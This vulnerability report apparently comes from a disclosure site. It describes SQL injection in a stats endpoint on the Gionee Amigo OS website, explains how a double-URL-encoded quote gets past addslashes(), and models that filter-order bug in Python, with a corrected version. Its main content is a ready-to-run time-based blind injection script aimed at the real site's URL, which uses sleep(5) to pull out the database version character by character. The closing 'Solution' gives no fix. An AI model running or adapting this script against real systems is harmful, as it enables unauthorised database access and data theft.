SQL injection on the main site of Gionee Amigo OS (with Python script)
~~~~~
Injection point: http://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1=111*&type=search
The injection parameter is val1.
Ordinary detection fails: a single-encoded quote is escaped. The payload has to be double URL-encoded.
From black-box testing, the server-side code is presumably something like this:
<?php
$id = $_GET['id'];          // PHP has already URL-decoded the query string once
$id = addslashes($id);      // escapes only the quotes that are present at this point
echo $id . "";
$id = urldecode($id);       // a %27 that survived addslashes() becomes a bare quote here
echo $id . "";
addslashes() runs first and urldecode() runs afterwards. PHP already decodes the query string once when it fills $_GET, so a quote sent as %27 arrives as ' and gets escaped; a quote sent as %2527 arrives as %27, passes addslashes() untouched, and is only turned back into ' by the later urldecode().
Therefore the payload must be URL-encoded twice before it is injected.
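To make the filter-order bug concrete, here is an added example that models the assumed server-side sequence in Python (this is not code from the report; the PHP sketch above is itself the author's guess, and the function names here are mine). It shows a single-encoded payload being neutralised by addslashes(), the double-encoded form reaching the SQL string intact, and the same pipeline with the order corrected so that decoding happens before escaping:

```python
import re
from urllib.parse import quote, unquote_plus


def php_addslashes(s: str) -> str:
    """Mimic PHP addslashes(): backslash-escape ' " \\ and NUL."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", s)


def vulnerable_pipeline(raw_query_value: str) -> str:
    """What reaches the SQL string on the page as sketched in the report
    (assumed): PHP URL-decodes the raw query string once while filling
    $_GET, addslashes() runs, and only then urldecode() runs."""
    in_get = unquote_plus(raw_query_value)   # the decode PHP does for $_GET
    escaped = php_addslashes(in_get)         # addslashes($id)
    return unquote_plus(escaped)             # urldecode($id)


def fixed_pipeline(raw_query_value: str) -> str:
    """Same steps with the order corrected: decode fully, escape last.
    (A prepared statement would be the real fix; this only shows the ordering.)"""
    in_get = unquote_plus(raw_query_value)
    decoded = unquote_plus(in_get)
    return php_addslashes(decoded)


def double_encode(payload: str) -> str:
    """Encode twice, as quote(quote(key)) does in the script: the outer layer
    is stripped by PHP, the inner layer hides the quote from addslashes()."""
    return quote(quote(payload, safe=""), safe="")


def quote_is_neutralised(sql_fragment: str) -> bool:
    """True when every single quote in the fragment is backslash-escaped."""
    return re.search(r"(?<!\\)'", sql_fragment) is None


if __name__ == "__main__":
    payload = "11' or '1'='1"                      # constructed sample payload
    single = quote(payload, safe="")
    double = double_encode(payload)
    print("single-encoded :", vulnerable_pipeline(single),
          "-> escaped" if quote_is_neutralised(vulnerable_pipeline(single)) else "-> LIVE")
    print("double-encoded :", vulnerable_pipeline(double),
          "-> escaped" if quote_is_neutralised(vulnerable_pipeline(double)) else "-> LIVE")
    print("fixed order    :", fixed_pipeline(double),
          "-> escaped" if quote_is_neutralised(fixed_pipeline(double)) else "-> LIVE")
```

The point is the asymmetry: addslashes() sees the value before the second decode, so anything that is still percent-encoded at that moment is invisible to it. Swapping the two calls removes that window, but escaping-by-hand remains fragile; parameterised queries do not depend on call order at all.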
Time-based blind injection is slow, so only the first characters of version() are guessed (the script below checks positions 1 through 9).
The script is as follows:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Time-based blind extraction of version() through the double-encoded
# injection point. (The original was a Python 2 script; ported to Python 3.)
import time
from urllib.parse import quote

import requests

url = 'http://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1={}&type=search'
# Characters tried at each position; '-' added because MySQL version strings
# such as "5.5.40-log" contain it.
payloads = '0123456789.-abcdefghijklmnopqrstuvwxyz @_:'
user = ''
for i in range(1, 10):            # positions 1..9 of version()
    for p in payloads:
        start_time = time.time()
        # sleep(5) fires only when the guessed character at position i is right
        key = " 11' xor if(ascii(mid(version(),{},1))={},sleep(5),1) and '1'='1".format(i, ord(p))
        # encode twice: PHP decodes $_GET once, addslashes() then sees no quote,
        # and urldecode() restores it afterwards
        u = url.format(quote(quote(key)))
        try:
            req = requests.get(u, timeout=60)
        except Exception as msg:
            print(msg)
        print(key)
        if time.time() - start_time > 5:   # delayed response => character confirmed
            user = user + p
            print("\n" + user + "\n")
            break
print('\n\nFinish: ' + user)
Solution:
You know ~~~~